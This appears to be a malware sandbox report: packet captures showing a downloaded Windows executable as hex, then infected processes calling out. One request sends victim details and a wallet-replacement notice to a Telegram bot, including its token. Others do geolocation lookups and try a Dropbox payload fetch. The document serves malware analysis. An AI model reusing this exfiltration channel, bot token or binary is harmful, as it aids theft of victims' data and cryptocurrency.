                                                                                                                                                                                                                                2024-07-06 11:26:58 UTC708INData Raw: 33 35 39 32 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9e c7 3a c2 da a6 54 91 da a6 54 91 da a6 54 91 da a6 55 91 16 a6 54 91 26 d1 ed 91 cf a6 54 91 26 d1 e8 91 d8 a6 54 91 44 06 93 91 db a6 54 91 1e 63 9b 91 91 a6 54 91 1e 63 9a 91 0b a6 54 91 1e 63 99 91 d1 a6 54 91 fd 60 87 91 d7 a6 54 91 fd 60 9d 91 db a6 54 91 da a6 c3 91 db a6 54 91 fd 60 98 91 db a6 54 91 52 69 63 68 da a6 54 91 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: 3592MZ@!L!This program cannot be run in DOS mode.$:TTTUT&T&TDTcTcTcT`T`TT`TRichT
                                                                                                                                                                                                                                2024-07-06 11:26:58 UTC1369INData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f8 1b 00 00 00 d0 03 00 00 1c 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: @@.reloc@B
                                                                                                                                                                                                                                2024-07-06 11:26:58 UTC1369INData Raw: 8b 5c 24 30 f3 0f 7f 47 18 48 83 c4 20 5f c3 cc cc 40 53 48 81 ec d0 07 00 00 48 8b 05 d8 3f 03 00 48 33 c4 48 89 84 24 c0 07 00 00 48 8b d9 84 d2 74 46 48 8d 4c 24 20 33 d2 41 b8 cc 02 00 00 e8 d4 45 01 00 48 8b 4b 08 48 8d 54 24 20 c7 44 24 20 02 00 10 00 ff 15 2d 4d 02 00 85 c0 75 10 48 8d 0d c2 a6 02 00 e8 21 af 00 00 33 c0 eb 48 8b 84 24 c4 00 00 00 eb 3f 48 8d 8c 24 f0 02 00 00 33 d2 41 b8 d0 04 00 00 e8 8b 45 01 00 48 8b 4b 08 48 8d 94 24 f0 02 00 00 c7 84 24 20 03 00 00 02 00 10 00 ff 15 be 4c 02 00 f7 d8 48 1b c0 48 23 84 24 78 03 00 00 48 8b 8c 24 c0 07 00 00 48 33 cc e8 41 a6 00 00 48 81 c4 d0 07 00 00 5b c3 40 55 53 56 57 48 8d ac 24 08 f9 ff ff 48 81 ec f8 07 00 00 48 8b 05 0d 3f 03 00 48 33 c4 48 89 85 e0 06 00 00 41 8a f9 49 8b d8 4c 8b da
                                                                                                                                                                                                                                Data Ascii: \$0GH _@SHH?H3H$HtFHL$ 3AEHKHT$ D$ -MuH!3H$?H$3AEHKH$$ LHH#$xH$H3AH[@USVWH$HH?H3HAIL
                                                                                                                                                                                                                                2024-07-06 11:26:58 UTC1369INData Raw: 48 8b 11 48 8b 02 48 63 48 04 48 8b 4c 11 48 48 85 c9 74 06 48 8b 01 ff 50 10 48 83 c4 28 c3 cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 8b 7a 10 49 8b e8 48 8b f2 48 8b d9 49 3b f8 0f 82 d2 00 00 00 49 2b f8 4c 3b cf 49 0f 42 f9 48 3b ca 75 2c 4a 8d 04 07 48 39 41 10 0f 82 c2 00 00 00 48 83 79 18 10 48 89 41 10 72 03 48 8b 09 c6 04 08 00 33 d2 48 8b cb e8 c1 00 00 00 eb 7f 48 83 ff fe 0f 87 a7 00 00 00 48 39 79 18 73 0e 4c 8b 41 10 48 8b d7 e8 3f 01 00 00 eb 1b 48 85 ff 75 1b 48 21 79 10 48 83 79 18 10 72 05 48 8b 01 eb 03 48 8b c1 c6 00 00 48 85 ff 74 41 48 83 7e 18 10 72 03 48 8b 36 48 83 7b 18 10 72 05 48 8b 0b eb 03 48 8b cb 48 85 ff 74 0c 48 8d 14 2e 4c 8b c7 e8 e3 a2 00 00 48 83 7b 18 10 48 89 7b 10 72 05 48 8b 03 eb 03 48 8b
                                                                                                                                                                                                                                Data Ascii: HHHcHHLHHtHPH(H\$Hl$Ht$WH HzIHHI;I+L;IBH;u,JH9AHyHArH3HHH9ysLAH?HuH!yHyrHHHtAH~rH6H{rHHHtH.LH{H{rHH
                                                                                                                                                                                                                                2024-07-06 11:26:58 UTC1369INData Raw: 89 5b 18 49 89 73 20 48 8b 05 39 35 03 00 48 33 c4 48 89 44 24 40 48 8b da 48 8b f1 49 89 4b d8 49 89 53 e0 83 64 24 20 00 48 c7 41 18 0f 00 00 00 48 83 61 10 00 c6 01 00 45 33 c0 48 8d 15 ec 9c 02 00 e8 f7 f8 ff ff c7 44 24 20 01 00 00 00 33 ff 48 39 7b 10 76 6c 48 8b 43 18 48 83 f8 10 72 05 48 8b 0b eb 03 48 8b cb 80 3c 39 41 7c 2c 48 83 f8 10 72 05 48 8b 0b eb 03 48 8b cb 80 3c 39 5a 7f 18 48 83 f8 10 72 05 48 8b 03 eb 03 48 8b c3 44 8a 04 38 41 80 c0 20 eb 12 48 83 f8 10 72 05 48 8b 03 eb 03 48 8b c3 44 8a 04 38 ba 01 00 00 00 48 8b ce e8 8c 06 00 00 48 ff c7 48 3b 7b 10 72 94 48 83 7b 18 10 72 08 48 8b 0b e8 e8 a4 00 00 48 c7 43 18 0f 00 00 00 48 83 63 10 00 c6 03 00 48 8b c6 48 8b 4c 24 40 48 33 cc e8 64 9b 00 00 48 8b 5c 24 70 48 8b 74 24 78 48 83
                                                                                                                                                                                                                                Data Ascii: [Is H95H3HD$@HHIKISd$ HAHaE3HD$ 3H9{vlHCHrHH<9A|,HrHH<9ZHrHHD8A HrHHD8HHH;{rH{rHHCHcHHL$@H3dH\$pHt$xH
                                                                                                                                                                                                                                2024-07-06 11:26:58 UTC1369INData Raw: 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 40 53 48 83 ec 20 48 83 79 18 08 48 8b d9 72 08 48 8b 09 e8 3c a0 00 00 33 c0 48 c7 43 18 07 00 00 00 48 89 43 10 66 89 03 48 83 c4 20 5b c3 cc 40 53 48 83 ec 20 48 8b d9 48 8b 09 48 85 c9 74 13 e8 0e a0 00 00 48 83 23 00 48 83 63 08 00 48 83 63 10 00 48 83 c4 20 5b c3 cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b d9 48 8b 49 08 48 8b fa 48 3b d1 0f 83 b4 00 00 00 48 39 13 0f 87 ab 00 00 00 48 2b 3b 48 b8 1b ca 6b 28 af a1 bc 06 48 f7 ef 48 8b fa 48 c1 ff 03 48 8b c7 48 c1 e8 3f 48 03 f8 48 3b 4b 10 75 08 48 8b cb e8 82 02 00 00 48 8b 4b 08 48 69 ff 30 01 00 00 be 30 01 00 00 48 03 3b 48 85 c9 0f 84 f9 00 00 00 48 8b c7 48 0b c1 83 e0 0f 0f 85 df 00 00 00 8d 50 02 8d 42 7e 0f 28 07 0f 29 01 0f 28 4f 10
                                                                                                                                                                                                                                Data Ascii: H\$0H _@SH HyHrH<3HCHCfH [@SH HHHtH#HcHcH [H\$Ht$WH HHIHH;H9H+;Hk(HHHHH?HH;KuHHKHi00H;HHHPB~()(O
                                                                                                                                                                                                                                2024-07-06 11:26:58 UTC1369INData Raw: ff c8 75 af 0f 28 02 0f 29 01 0f 28 4a 10 0f 29 49 10 0f 28 42 20 0f 29 41 20 eb 08 4c 8b c5 e8 a1 93 00 00 48 03 fd 48 03 dd 48 3b fe 0f 85 61 ff ff ff 48 8b 6c 24 38 48 8b 74 24 40 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 48 89 5c 24 08 57 48 81 ec 70 06 00 00 48 8b 05 34 2a 03 00 48 33 c4 48 89 84 24 60 06 00 00 48 8d 94 24 50 04 00 00 41 b8 04 01 00 00 33 c9 ff 15 13 38 02 00 33 ff 85 c0 75 07 32 c0 e9 a2 00 00 00 45 33 c9 48 8d 84 24 40 02 00 00 45 33 c0 41 8d 51 1c 33 c9 48 89 44 24 20 ff 15 d7 39 02 00 85 c0 78 d6 45 33 c9 48 8d 44 24 30 45 33 c0 41 8d 51 1a 33 c9 48 89 44 24 20 ff 15 b7 39 02 00 85 c0 78 b6 48 83 cb ff 48 8d 84 24 40 02 00 00 4c 8b c3 49 ff c0 66 42 39 3c 40 75 f6 48 8d 94 24 40 02 00 00 48 8d 8c 24 50 04 00 00 e8 c9 9c 00
                                                                                                                                                                                                                                Data Ascii: u()(J)I(B )A LHHH;aHl$8Ht$@HH\$0H _H\$WHpH4*H3H$`H$PA383u2E3H$@E3AQ3HD$ 9xE3HD$0E3AQ3HD$ 9xHH$@LIfB9<@uH$@H$P
                                                                                                                                                                                                                                2024-07-06 11:26:58 UTC1369INData Raw: 00 00 45 33 c0 41 8d 51 1c 33 c9 48 89 44 24 20 ff 15 16 35 02 00 85 c0 78 18 4c 8d 85 60 03 00 00 48 8d 54 24 40 48 8d 8d 50 01 00 00 e8 22 fc ff ff 48 8d 8d 50 01 00 00 e8 5e fd ff ff 48 8d 4c 24 40 e8 54 98 00 00 48 8b 8d 70 05 00 00 48 33 cc e8 f5 8b 00 00 48 81 c4 80 06 00 00 5d c3 44 8b c1 48 63 4a 3c 48 03 ca 44 0f b7 49 14 4c 03 c9 45 3b 41 2c 73 04 41 8b c0 c3 44 0f b7 51 06 33 d2 45 85 d2 7e 29 0f b7 c2 48 8d 0c 80 45 8b 5c c9 24 45 3b c3 72 0d 41 8b 4c c9 28 41 03 cb 44 3b c1 72 0e 66 ff c2 0f b7 c2 41 3b c2 7c d7 33 c0 c3 0f b7 c2 48 8d 0c 80 41 8b 44 c9 2c 41 2b 44 c9 24 41 03 c0 c3 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 48 63 41 3c 48 8b d9 b9 0b 01 00 00 66 39 4c 18 18 74 77 b9 0b 02 00 00 66 39
                                                                                                                                                                                                                                Data Ascii: E3AQ3HD$ 5xL`HT$@HP"HP^HL$@THpH3H]DHcJ<HDILE;A,sADQ3E~)HE\$E;rAL(AD;rfA;|3HAD,A+D$AHHXHhHpHx AVH HcA<Hf9Ltwf9
                                                                                                                                                                                                                                2024-07-06 11:26:58 UTC1369INData Raw: 01 00 00 48 8b 7c 24 58 48 83 7d b8 08 72 09 48 8b 4d a0 e8 3f 90 00 00 48 c7 45 b8 07 00 00 00 4c 89 75 b0 66 44 89 75 a0 48 8d 47 ff 48 83 f8 fd 0f 87 e7 00 00 00 4c 89 75 d8 33 c0 48 89 45 e0 48 8d 15 13 8a 02 00 48 8d 0d 2c 8a 02 00 e8 4f da 00 00 85 c0 75 29 c6 45 98 01 c7 44 24 20 0d 00 00 00 44 8d 48 01 4c 8d 45 98 48 8d 55 d8 48 8b cf ff 15 fa 2f 02 00 85 c0 0f 88 9d 00 00 00 4c 89 75 d0 4c 89 74 24 40 48 8d 45 d0 48 89 44 24 38 89 74 24 30 48 89 5c 24 28 48 8d 45 d8 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 48 8b cf ff 15 a5 2f 02 00 85 c0 79 08 ff 15 2b 2d 02 00 eb 5c 48 8d 15 a2 89 02 00 48 8d 0d ab 89 02 00 e8 ce d9 00 00 85 c0 75 40 45 33 c0 33 d2 8d 48 40 ff 15 b4 2c 02 00 48 8b d8 ff 15 8b 2c 02 00 48 8b c8 c7 44 24 30 02 00 00 00 44 89 74 24
                                                                                                                                                                                                                                Data Ascii: H|$XH}rHM?HELufDuHGHLu3HEHH,Ou)ED$ DHLEHUH/LuLt$@HEHD$8t$0H\$(HEHD$ E3E33H/y+-\HHu@E33H@,H,HD$0Dt$
                                                                                                                                                                                                                                2024-07-06 11:26:58 UTC1369INData Raw: a6 20 01 00 48 8d 54 24 50 48 8d 0d ba b3 02 00 44 8b c3 ff 15 a9 29 02 00 45 33 c9 48 89 7c 24 30 48 8d 8c 24 60 02 00 00 45 8d 41 01 ba 00 00 00 80 c7 44 24 28 80 00 00 00 c7 44 24 20 03 00 00 00 ff 15 a2 28 02 00 48 8d 54 24 40 48 8b c8 48 89 7c 24 40 48 8b d8 e8 a9 7e 00 00 48 8b f0 48 85 c0 74 4d 48 8b cb ff 15 04 28 02 00 8b 54 24 40 48 8b ce e8 a8 f8 ff ff 48 8b c8 e8 6c fb ff ff 48 8d 4c 24 50 48 8b d6 4c 8b c8 e8 fc fb ff ff 48 8b 54 24 40 41 b8 00 40 00 00 48 8b ce 8a d8 ff 15 02 29 02 00 84 db 40 0f 95 c7 8b c7 eb 03 83 c8 ff 48 8b 8c 24 70 04 00 00 48 33 cc e8 d5 80 00 00 4c 8d 9c 24 80 04 00 00 49 8b 5b 10 49 8b 73 18 49 8b e3 5f c3 40 53 48 83 ec 20 45 33 c0 48 c7 41 18 07 00 00 00 48 8b d9 4c 89 41 10 66 44 89 01 66 44 39 02 74 11 48 83 c8
                                                                                                                                                                                                                                Data Ascii: HT$PHD)E3H|$0H$`EAD$(D$ (HT$@HH|$@H~HHtMH(T$@HHlHL$PHLHT$@A@H)@H$pH3L$I[IsI_@SH E3HAHLAfDfD9tH


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.449751149.154.167.2204436828C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:20 UTC1306OUTGET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3EF8C0C6DCE8981733A6%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/134349%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E06/07/2024%2011:27:15%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5C3CBD.tmp.Installer.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E617%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1% [TRUNCATED]
                                                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:27:20 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:20 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 1389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                2024-07-06 11:27:20 UTC1389INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 33 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 32 33 38 31 35 30 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 30 32 36 35 32 34 30 2c 22 74 65 78 74 22
                                                                                                                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":26306,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1720265240,"text"


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.449755188.114.96.34437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:21 UTC67OUTGET /xml/ HTTP/1.1
                                                                                                                                                                                                                                Host: freegeoip.app
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:27:21 UTC641INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:21 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                Expires: Sat, 06 Jul 2024 12:27:21 GMT
                                                                                                                                                                                                                                Location: https://ipbase.com/xml/
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sybfj2Fs%2BfRjTfmxwPk1AmoYdgsJu3uUFljUT8edelxdkmIOPp9R%2BjtHkrCOicyvJAecq1d52XbsCr0t3kRPTOgS4DqmGqoV7AI%2BVMdFfxxe4aMcZ%2FN9szHOlDacjZIJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3ec1fd787ca5-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                2024-07-06 11:27:21 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                3192.168.2.449754162.125.66.154437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:21 UTC107OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:27:22 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:21 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 070ae673771847d5ae90f26a1e675131
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:27:22 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                4192.168.2.449756162.125.66.154437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:21 UTC107OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:27:22 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:21 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 67cfd327a89144d898cb8e260c519356
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:27:22 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                5192.168.2.449757172.67.209.714437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:22 UTC64OUTGET /xml/ HTTP/1.1
                                                                                                                                                                                                                                Host: ipbase.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:27:22 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:22 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                Cache-Control: public,max-age=0,must-revalidate
                                                                                                                                                                                                                                Cache-Status: "Netlify Edge"; fwd=miss
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Nf-Request-Id: 01J23WRXZC0BM4165B5GPY1TFE
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6UZrlvMPaDSEnXkSG0na44T4RaaVoVJuAy5tb8vAOvgyXsnn5QpS51%2B4%2Fh97bvolDxS4QcDEQ0h7X83MUaaO%2Fo%2BrE6HS9n%2FoXC4HgS5RM48xBA5mi2FRCMwRMN44"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3ec62affc454-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
